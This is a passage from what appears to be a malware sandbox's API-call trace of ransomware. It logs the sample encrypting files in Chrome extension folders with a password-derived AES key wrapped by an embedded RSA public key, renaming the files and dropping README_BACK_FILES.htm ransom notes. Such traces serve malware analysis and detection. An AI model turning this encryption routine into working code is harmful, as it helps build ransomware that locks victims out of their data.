Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_tw\\messages.json")) returned 0x20 [0259.950] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json", dwFileAttributes=0x80) returned 1 [0259.951] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0259.951] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_tw\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0259.952] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0259.953] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0259.954] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0259.954] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0259.954] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb418, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0259.954] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c440) returned 1 [0259.954] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0259.955] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0259.955] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6e758) returned 1 [0259.955] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6e758, dwCertEncodingType=0x1, pInfo=0x2e28c50*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e28c80*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e28c88*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7cb40) returned 1 [0259.955] CryptEncrypt (in: hKey=0x2e7cb40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0259.955] CryptEncrypt (in: hKey=0x2e7cb40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6f060*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6f060*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0259.956] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e6f060*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6f060*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0259.957] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x280, lpOverlapped=0x0) returned 1 [0259.958] CryptEncrypt (in: hKey=0x2e7c440, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x280, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x290) returned 1 [0259.958] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x290, lpOverlapped=0x0) returned 1 [0259.960] CloseHandle (hObject=0x5d5c) returned 1 [0259.960] CloseHandle (hObject=0x5d60) returned 1 [0259.960] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_tw\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_tw\\messages.json"), bFailIfExists=0) returned 1 [0259.963] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json", dwFileAttributes=0x0) returned 1 [0259.963] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_tw\\messages.json.gsg")) returned 1 [0259.964] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_tw\\messages.json.fuck")) returned 1 [0259.965] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0259.965] CryptDestroyKey (hKey=0x2e7c440) returned 1 [0259.965] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0259.965] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0259.966] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0259.966] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_tw\\readme_back_files.htm")) returned 0xffffffff [0259.966] AreFileApisANSI () returned 1 [0259.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3850, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 160 [0259.966] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_tw\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.966] GetFileType (hFile=0x5d64) returned 0x1 [0259.967] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0259.967] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0 [0259.967] FindClose (in: hFindFile=0x2e7fc00 | out: hFindFile=0x2e7fc00) returned 1 [0259.968] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\readme_back_files.htm")) returned 0xffffffff [0259.968] AreFileApisANSI () returned 1 [0259.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0259.968] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d268, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0259.969] GetFileType (hFile=0x5d50) returned 0x1 [0259.969] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9beb4*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9beac, lpOverlapped=0x0 | out: lpBuffer=0x2b9beb4*, lpNumberOfBytesWritten=0x2b9beac*=0x5ec, lpOverlapped=0x0) returned 1 [0259.970] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0259.970] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\*.*", lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0x2e7fc00 [0259.970] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.970] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.970] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cff4 | out: lpSystemTimeAsFileTime=0x2b9cff4) [0259.970] GetLastError () returned 0x0 [0259.970] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json")) returned 0x20 [0259.971] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json", dwFileAttributes=0x80) returned 1 [0259.971] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.971] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0259.972] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json.gsg", dwFileAttributes=0x2) returned 1 [0259.972] CryptAcquireContextA (in: phProv=0x2b9bff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bff0*=0x2e7b4f0) returned 1 [0259.974] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bff4 | out: phHash=0x2b9bff4) returned 1 [0259.974] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0259.974] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb328, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0259.974] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bfe0 | out: phKey=0x2b9bfe0*=0x2e7c440) returned 1 [0259.974] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----c", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0259.974] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bffc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8 | out: pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8) returned 1 [0259.974] CryptAcquireContextA (in: phProv=0x2b9bfec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bfec*=0x2e6e648) returned 1 [0259.975] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6e648, dwCertEncodingType=0x1, pInfo=0x2e28df0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e28e20*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e28e28*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bfe4 | out: phKey=0x2b9bfe4*=0x2e7c7c0) returned 1 [0259.975] CryptEncrypt (in: hKey=0x2e7c7c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x80) returned 1 [0259.975] CryptEncrypt (in: hKey=0x2e7c7c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6e7e0*, pdwDataLen=0x2b9bfe8*=0x18, dwBufLen=0x80 | out: pbData=0x2e6e7e0*, pdwDataLen=0x2b9bfe8*=0x80) returned 1 [0259.975] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e6e7e0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x2e6e7e0*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0259.976] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0259.984] CryptEncrypt (in: hKey=0x2e7c440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0259.984] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0259.994] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0259.995] CryptEncrypt (in: hKey=0x2e7c440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0259.995] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0259.995] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0259.995] CryptEncrypt (in: hKey=0x2e7c440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0259.995] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0259.995] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0259.995] CryptEncrypt (in: hKey=0x2e7c440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0259.995] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0259.995] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0259.995] CryptEncrypt (in: hKey=0x2e7c440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0259.995] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0259.996] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0259.996] CryptEncrypt (in: hKey=0x2e7c440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0259.996] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0259.996] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0259.996] CryptEncrypt (in: hKey=0x2e7c440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0259.996] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0259.996] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0259.996] CryptEncrypt (in: hKey=0x2e7c440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0259.997] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0259.997] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0259.997] CryptEncrypt (in: hKey=0x2e7c440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0259.997] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0259.997] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0259.997] CryptEncrypt (in: hKey=0x2e7c440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0259.997] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0259.997] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: 